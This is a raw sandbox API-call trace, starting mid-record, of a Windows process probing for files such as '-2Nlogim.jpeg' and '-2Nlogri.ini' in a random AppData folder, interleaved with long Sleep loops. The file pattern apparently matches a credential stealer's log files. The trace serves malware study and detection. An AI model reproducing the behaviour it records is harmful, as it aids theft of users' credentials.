EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0146.362] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0146.362] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892a0b0) returned 1 [0146.362] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.362] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0146.362] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0146.362] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8929b10) returned 1 [0146.362] Sleep (dwMilliseconds=0x7d0) [0146.364] Sleep (dwMilliseconds=0x7d0) [0146.366] Sleep (dwMilliseconds=0x7d0) [0146.367] Sleep (dwMilliseconds=0x7d0) [0146.369] Sleep (dwMilliseconds=0x7d0) [0146.370] Sleep (dwMilliseconds=0x7d0) [0146.372] Sleep (dwMilliseconds=0x7d0) [0146.373] Sleep (dwMilliseconds=0x7d0) [0146.375] Sleep (dwMilliseconds=0x7d0) [0146.376] Sleep (dwMilliseconds=0x7d0) [0146.378] Sleep (dwMilliseconds=0x7d0) [0146.379] Sleep (dwMilliseconds=0x7d0) [0146.381] Sleep (dwMilliseconds=0x7d0) [0146.383] Sleep (dwMilliseconds=0x7d0) [0146.384] Sleep (dwMilliseconds=0x7d0) [0146.386] Sleep (dwMilliseconds=0x7d0) [0146.387] Sleep (dwMilliseconds=0x7d0) [0146.389] Sleep (dwMilliseconds=0x7d0) [0146.390] Sleep (dwMilliseconds=0x7d0) [0146.392] Sleep (dwMilliseconds=0x7d0) [0146.393] Sleep (dwMilliseconds=0x7d0) [0146.395] Sleep (dwMilliseconds=0x7d0) [0146.396] Sleep (dwMilliseconds=0x7d0) [0146.398] Sleep (dwMilliseconds=0x7d0) [0146.399] Sleep (dwMilliseconds=0x7d0) [0146.401] Sleep (dwMilliseconds=0x7d0) [0146.402] Sleep (dwMilliseconds=0x7d0) [0146.404] Sleep (dwMilliseconds=0x7d0) [0146.405] Sleep (dwMilliseconds=0x7d0) [0146.407] Sleep (dwMilliseconds=0x7d0) [0146.408] Sleep (dwMilliseconds=0x7d0) [0146.410] Sleep (dwMilliseconds=0x7d0) [0146.411] Sleep (dwMilliseconds=0x7d0) [0146.413] Sleep (dwMilliseconds=0x7d0) [0146.414] Sleep (dwMilliseconds=0x7d0) [0146.416] Sleep (dwMilliseconds=0x7d0) [0146.417] Sleep (dwMilliseconds=0x7d0) [0146.419] Sleep (dwMilliseconds=0x7d0) [0146.421] Sleep (dwMilliseconds=0x7d0) [0146.422] Sleep (dwMilliseconds=0x7d0) [0146.424] Sleep (dwMilliseconds=0x7d0) [0146.425] Sleep (dwMilliseconds=0x7d0) [0146.427] Sleep (dwMilliseconds=0x7d0) [0146.428] Sleep (dwMilliseconds=0x7d0) [0146.430] Sleep (dwMilliseconds=0x7d0) [0146.440] Sleep (dwMilliseconds=0x7d0) [0146.441] Sleep (dwMilliseconds=0x7d0) [0146.443] Sleep (dwMilliseconds=0x7d0) [0146.444] Sleep (dwMilliseconds=0x7d0) [0146.446] Sleep (dwMilliseconds=0x7d0) [0146.447] Sleep (dwMilliseconds=0x7d0) [0146.449] Sleep (dwMilliseconds=0x7d0) [0146.450] Sleep (dwMilliseconds=0x7d0) [0146.452] Sleep (dwMilliseconds=0x7d0) [0146.453] Sleep (dwMilliseconds=0x7d0) [0146.455] Sleep (dwMilliseconds=0x7d0) [0146.456] Sleep (dwMilliseconds=0x7d0) [0146.485] Sleep (dwMilliseconds=0x7d0) [0146.486] Sleep (dwMilliseconds=0x7d0) [0146.488] Sleep (dwMilliseconds=0x7d0) [0146.489] Sleep (dwMilliseconds=0x7d0) [0146.491] Sleep (dwMilliseconds=0x7d0) [0146.492] Sleep (dwMilliseconds=0x7d0) [0146.494] Sleep (dwMilliseconds=0x7d0) [0146.495] Sleep (dwMilliseconds=0x7d0) [0146.497] Sleep (dwMilliseconds=0x7d0) [0146.498] Sleep (dwMilliseconds=0x7d0) [0146.500] Sleep (dwMilliseconds=0x7d0) [0146.501] Sleep (dwMilliseconds=0x7d0) [0146.503] Sleep (dwMilliseconds=0x7d0) [0146.505] Sleep (dwMilliseconds=0x7d0) [0146.507] Sleep (dwMilliseconds=0x7d0) [0146.508] Sleep (dwMilliseconds=0x7d0) [0146.510] Sleep (dwMilliseconds=0x7d0) [0146.511] Sleep (dwMilliseconds=0x7d0) [0146.513] Sleep (dwMilliseconds=0x7d0) [0146.514] Sleep (dwMilliseconds=0x7d0) [0146.516] Sleep (dwMilliseconds=0x7d0) [0146.517] Sleep (dwMilliseconds=0x7d0) [0146.519] Sleep (dwMilliseconds=0x7d0) [0146.520] Sleep (dwMilliseconds=0x7d0) [0146.522] Sleep (dwMilliseconds=0x7d0) [0146.523] Sleep (dwMilliseconds=0x7d0) [0146.525] Sleep (dwMilliseconds=0x7d0) [0146.526] Sleep (dwMilliseconds=0x7d0) [0146.528] Sleep (dwMilliseconds=0x7d0) [0146.529] Sleep (dwMilliseconds=0x7d0) [0146.531] Sleep (dwMilliseconds=0x7d0) [0146.532] Sleep (dwMilliseconds=0x7d0) [0146.534] Sleep (dwMilliseconds=0x7d0) [0146.535] Sleep (dwMilliseconds=0x7d0) [0146.537] Sleep (dwMilliseconds=0x7d0) [0146.538] Sleep (dwMilliseconds=0x7d0) [0146.540] Sleep (dwMilliseconds=0x7d0) [0146.541] Sleep (dwMilliseconds=0x7d0) [0146.543] Sleep (dwMilliseconds=0x7d0) [0146.545] Sleep (dwMilliseconds=0x7d0) [0146.546] Sleep (dwMilliseconds=0x7d0) [0146.548] Sleep (dwMilliseconds=0x7d0) [0146.549] Sleep (dwMilliseconds=0x7d0) [0146.551] Sleep (dwMilliseconds=0x7d0) [0146.552] Sleep (dwMilliseconds=0x7d0) [0146.554] Sleep (dwMilliseconds=0x7d0) [0146.555] Sleep (dwMilliseconds=0x7d0) [0146.557] Sleep (dwMilliseconds=0x7d0) [0146.558] Sleep (dwMilliseconds=0x7d0) [0146.560] Sleep (dwMilliseconds=0x7d0) [0146.561] Sleep (dwMilliseconds=0x7d0) [0146.563] Sleep (dwMilliseconds=0x7d0) [0146.564] Sleep (dwMilliseconds=0x7d0) [0146.566] Sleep (dwMilliseconds=0x7d0) [0146.567] Sleep (dwMilliseconds=0x7d0) [0146.569] Sleep (dwMilliseconds=0x7d0) [0146.570] Sleep (dwMilliseconds=0x7d0) [0146.572] Sleep (dwMilliseconds=0x7d0) [0146.573] Sleep (dwMilliseconds=0x7d0) [0146.575] Sleep (dwMilliseconds=0x7d0) [0146.576] Sleep (dwMilliseconds=0x7d0) [0146.578] Sleep (dwMilliseconds=0x7d0) [0146.579] Sleep (dwMilliseconds=0x7d0) [0146.581] Sleep (dwMilliseconds=0x7d0) [0146.586] Sleep (dwMilliseconds=0x7d0) [0146.587] Sleep (dwMilliseconds=0x7d0) [0146.589] Sleep (dwMilliseconds=0x7d0) [0146.590] Sleep (dwMilliseconds=0x7d0) [0146.592] Sleep (dwMilliseconds=0x7d0) [0146.594] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtPathName=0x10b3fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.594] NtCreateFile (in: FileHandle=0x10b3fac0, DesiredAccess=0x120089, ObjectAttributes=0x10b3fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlog00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlog00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fac0*=0xffffffffffffffff, IoStatusBlock=0x10b3fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0146.594] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa40 | out: HeapArray=0x10b3fa40*=0x4b0000) returned 0x6 [0146.594] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928880) returned 1 [0146.594] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.594] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0146.594] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0146.594] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8929b10) returned 1 [0146.594] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.595] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0146.595] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0146.595] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928be0) returned 1 [0146.595] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.595] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0146.595] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0146.595] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928880) returned 1 [0146.595] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.595] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0146.595] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0146.595] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928880) returned 1 [0146.595] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.595] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0146.595] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0146.595] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x892a4a0) returned 1 [0146.595] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.596] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0146.596] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0146.596] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8929960) returned 1 [0146.596] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.596] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0146.596] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0146.596] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8929b10) returned 1 [0146.596] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.596] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0146.596] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0146.596] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8929f00) returned 1 [0146.596] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtPathName=0x10b3fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.596] NtCreateFile (in: FileHandle=0x10b3fa80, DesiredAccess=0x120089, ObjectAttributes=0x10b3faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa80*=0xffffffffffffffff, IoStatusBlock=0x10b3fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0146.597] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3fa00 | out: HeapArray=0x10b3fa00*=0x4b0000) returned 0x6 [0146.597] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928be0) returned 1 [0146.597] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtPathName=0x10b3fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0146.597] NtCreateFile (in: FileHandle=0x10b3fa50, DesiredAccess=0x120089, ObjectAttributes=0x10b3fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\-2NP6R7E\\-2Nlogim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\-2np6r7e\\-2nlogim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x10b3fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x10b3fa50*=0xffffffffffffffff, IoStatusBlock=0x10b3fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0146.597] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x10b3f9d0 | out: HeapArray=0x10b3f9d0*=0x4b0000) returned 0x6 [0146.597] RtlFreeHeap (HeapHandle=0x4b0000, Flags=0x0, BaseAddress=0x8928880) returned 1 [0146.597] Sleep (dwMilliseconds=0x7d0) [0146.599] Sleep (dwMilliseconds=0x7d0) [0146.600] Sleep (dwMilliseconds=0x7d0) [0146.602] Sleep (dwMilliseconds=0x7d0) [0146.603] Sleep (dwMilliseconds=0x7d0) [0146.605] Sleep (dwMilliseconds=0x7d0) [0146.606] Sleep (dwMilliseconds=0x7d0) [0146.608] Sleep (dwMilliseconds=0x7d0) [0146.609] Sleep (dwMilliseconds=0x7d0) [0146.611] Sleep (dwMilliseconds=0x7d0) [0146.612] Sleep (dwMilliseconds=0x7d0) [0146.614] Sleep (dwMilliseconds=0x7d0) [0146.615] Sleep (dwMilliseconds=0x7d0) [0146.617] Sleep (dwMilliseconds=0x7d0) [0146.618] Sleep (dwMilliseconds=0x7d0) [0146.620] Sleep (dwMilliseconds=0x7d0) [0146.621] Sleep (dwMilliseconds=0x7d0) [0146.623] Sleep (dwMilliseconds=0x7d0) [0146.624] Sleep (dwMilliseconds=0x7d0) [0146.626] Sleep (dwMilliseconds=0x7d0) [0146.628] Sleep (dwMilliseconds=0x7d0) [0146.629] Sleep (dwMilliseconds=0x7d0) [0146.631] Sleep (dwMilliseconds=0x7d0) [0146.632] Sleep (dwMilliseconds=0x7d0) [0146.634] Sleep (dwMilliseconds=0x7d0) [0146.635] Sleep (dwMilliseconds=0x7d0) [0146.637] Sleep (dwMilliseconds=0x7d0) [0146.638] Sleep (dwMilliseconds=0x7d0) [0146.640] Sleep (dwMilliseconds=0x7d0) [0146.642] Sleep (dwMilliseconds=0x7d0) [0146.643] Sleep (dwMilliseconds=0x7d0) [0146.645] Sleep (dwMilliseconds=0x7d0) [0146.646] Sleep (dwMilliseconds=0x7d0) [0146.648] Sleep (dwMilliseconds=0x7d0) [0146.649] Sleep (dwMilliseconds=0x7d0) [0146.651] Sleep (dwMilliseconds=0x7d0) [0146.653] Sleep (dwMilliseconds=0x7d0) [0146.654] Sleep (dwMilliseconds=0x7d0) [0146.656] Sleep (dwMilliseconds=0x7d0) [0146.657] Sleep (dwMilliseconds=0x7d0) [0146.659] Sleep (dwMilliseconds=0x7d0) [0146.660] Sleep (dwMilliseconds=0x7d0) [0146.662] Sleep (dwMilliseconds=0x7d0) [0146.663] Sleep (dwMilliseconds=0x7d0) [0146.665] Sleep (dwMilliseconds=0x7d0) [0146.666] Sleep (dwMilliseconds=0x7d0) [0146.668] Sleep (dwMilliseconds=0x7d0) [0146.669] Sleep (dwMilliseconds=0x7d0) [0146.671] Sleep (dwMilliseconds=0x7d0) [0146.672] Sleep (dwMilliseconds=0x7d0) [0146.674] Sleep (dwMilliseconds=0x7d0) [0146.675] Sleep (dwMilliseconds=0x7d0) [0146.677] Sleep (dwMilliseconds=0x7d0) [0146.678] Sleep (dwMilliseconds=0x7d0) [0146.680] Sleep (dwMilliseconds=0x7d0) [0146.681] Sleep (dwMilliseconds=0x7d0) [0146.683] Sleep (dwMilliseconds=0x7d0) [0146.685] Sleep (dwMilliseconds=0x7d0) [0146.687] Sleep (dwMilliseconds=0x7d0) [0146.688] Sleep (dwMilliseconds=0x7d0) [0146.690] Sleep (dwMilliseconds=0x7d0) [0146.691] Sleep (dwMilliseconds=0x7d0) [0146.693] Sleep (dwMilliseconds=0x7d0) [0146.694] Sleep (dwMilliseconds=0x7d0) [0146.697] Sleep (dwMilliseconds=0x7d0) [0146.698] Sleep (dwMilliseconds=0x7d0) [0146.700] Sleep (dwMilliseconds=0x7d0) [0146.701] Sleep (dwMilliseconds=0x7d0) [0146.703] Sleep (dwMilliseconds=0x7d0) [0146.704] Sleep (dwMilliseconds=0x7d0) [0146.706] Sleep (dwMilliseconds=0x7d0) [0146.707] Sleep (dwMilliseconds=0x7d0) [0146.709] Sleep (dwMilliseconds=0x7d0) [0146.710] Sleep (dwMilliseconds=0x7d0) [0146.712] Sleep (dwMilliseconds=0x7d0) [0146.713] Sleep (dwMilliseconds=0x7d0) [0146.715] Sleep (dwMilliseconds=0x7d0) [0146.716] Sleep (dwMilliseconds=0x7d0) [0146.718] Sleep (dwMilliseconds=0x7d0) [0146.719] Sleep (dwMilliseconds=0x7d0) [0146.721] Sleep 